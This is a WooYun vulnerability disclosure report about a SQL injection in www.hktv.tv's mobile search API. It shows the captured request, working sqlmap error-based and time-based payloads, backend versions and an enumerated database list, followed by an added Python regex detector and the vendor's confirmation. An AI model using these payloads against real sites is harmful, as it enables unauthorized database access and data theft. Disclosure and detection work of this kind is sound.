WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
WooYun Drops articles, online browsing: http://drop.zone.ci/
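2015-05-18: Details reported to the vendor; awaiting vendor handling
2015-05-18: Vendor confirmed; details disclosed to the vendor only
2015-05-28: Details disclosed to core white hats and experts in related fields
2015-06-07: Details disclosed to regular white hats
2015-06-17: Details disclosed to intern white hats
2015-07-02: Details disclosed to the public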
光息谷 is an app owned by 云视.
Capture the traffic of the app's search function directly:
POST /e/extend/new_client_api/search.php HTTP/1.1
Host: www.hktv.tv
Proxy-Connection: keep-alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 38
Connection: keep-alive
User-Agent: 光息谷 2.9 (iPhone; iPhone OS 8.3; zh_CN)

page=0&searname=%E3%80%82&pagecount=10
This revealed a SQL injection in the POST body:
sqlmap identified the following injection points with a total of 1178 HTTP(s) requests:
---
Place: POST
Parameter: searname
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: page=0&searname=%E3%80%82' AND (SELECT 7148 FROM(SELECT COUNT(*),CONCAT(0x3a697a733a,(SELECT (CASE WHEN (7148=7148) THEN 1 ELSE 0 END)),0x3a6371623a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yKIV'='yKIV&pagecount=10

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: page=0&searname=%E3%80%82' AND 9963=BENCHMARK(5000000,MD5(0x6d516956)) AND 'BITH'='BITH&pagecount=10
---
[15:11:30] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.23
back-end DBMS: MySQL 5.0
[15:11:30] [INFO] fetched data logged to text files under 'D:\sqlmap\output\www.hktv.tv'

[*] shutting down at 15:11:30
Database address:
[email protected]:54468
All table names:
[*] bbs_hktv
[*] cdp
[*] cms_as
[*] cms_hktv
[*] information_schema
[*] jsbc-security
[*] meicam
[*] mysql
[*] odp
[*] onairfastedit
[*] onairtranscode
[*] ors
[*] performance_schema
[*] security_as
[*] security_hktv
[*] security_hn
[*] vms
[*] vms_as
[*] vms_hktv
[*] vms_jyg
[*] vms_sjs
[*] wechat_hn
[*] wechat_sjs
[*] yicloud_aliyun_rds_dummy_database
I did not dig any further into the data; the test ends here.
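
Added example, not part of the original report: a heuristic detector that URL-decodes form-encoded POST bodies and flags the two techniques sqlmap reported for the searname parameter. The function name, signature names and regular expressions are assumptions; the sample bodies are the request and payloads shown in this report.

```python
import re
from urllib.parse import parse_qsl

# Heuristic signatures (names are assumptions) for the two techniques in the
# sqlmap output above, plus the quote break-out both payloads start with.
SIGNATURES = {
    "error_based": re.compile(r"floor\s*\(\s*rand\s*\(.*group\s+by", re.I | re.S),
    "time_based": re.compile(r"\b(?:benchmark|sleep)\s*\(", re.I),
    "quote_breakout": re.compile(r"'\s*(?:and|or)\b", re.I),
}

# Sample bodies: the captured search request and the two payloads from this report.
BENIGN = "page=0&searname=%E3%80%82&pagecount=10"
ERROR_BASED = (
    "page=0&searname=%E3%80%82' AND (SELECT 7148 FROM(SELECT COUNT(*),"
    "CONCAT(0x3a697a733a,(SELECT (CASE WHEN (7148=7148) THEN 1 ELSE 0 END)),"
    "0x3a6371623a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS "
    "GROUP BY x)a) AND 'yKIV'='yKIV&pagecount=10"
)
TIME_BASED = (
    "page=0&searname=%E3%80%82' AND 9963=BENCHMARK(5000000,MD5(0x6d516956)) "
    "AND 'BITH'='BITH&pagecount=10"
)


def scan_body(body):
    """Return {parameter: [signature names]} for a form-encoded POST body."""
    hits = {}
    # parse_qsl URL-decodes every value, so %27 and a literal ' are treated alike.
    for name, value in parse_qsl(body, keep_blank_values=True):
        matched = [label for label, rx in SIGNATURES.items() if rx.search(value)]
        if matched:
            hits[name] = matched
    return hits


if __name__ == "__main__":
    for label, body in [("benign", BENIGN), ("error", ERROR_BASED), ("time", TIME_BASED)]:
        print(label, scan_body(body))
```

A detector like this only helps spot probing in request logs; the durable fix on the server side is to bind searname as a parameter in a prepared statement instead of concatenating it into the query.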
RT
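Severity: High
Vulnerability Rank: 20
Confirmation time: 2015-05-18 15:40
Thank you for your attention. We will fix this issue as soon as possible. Thank you.
None yet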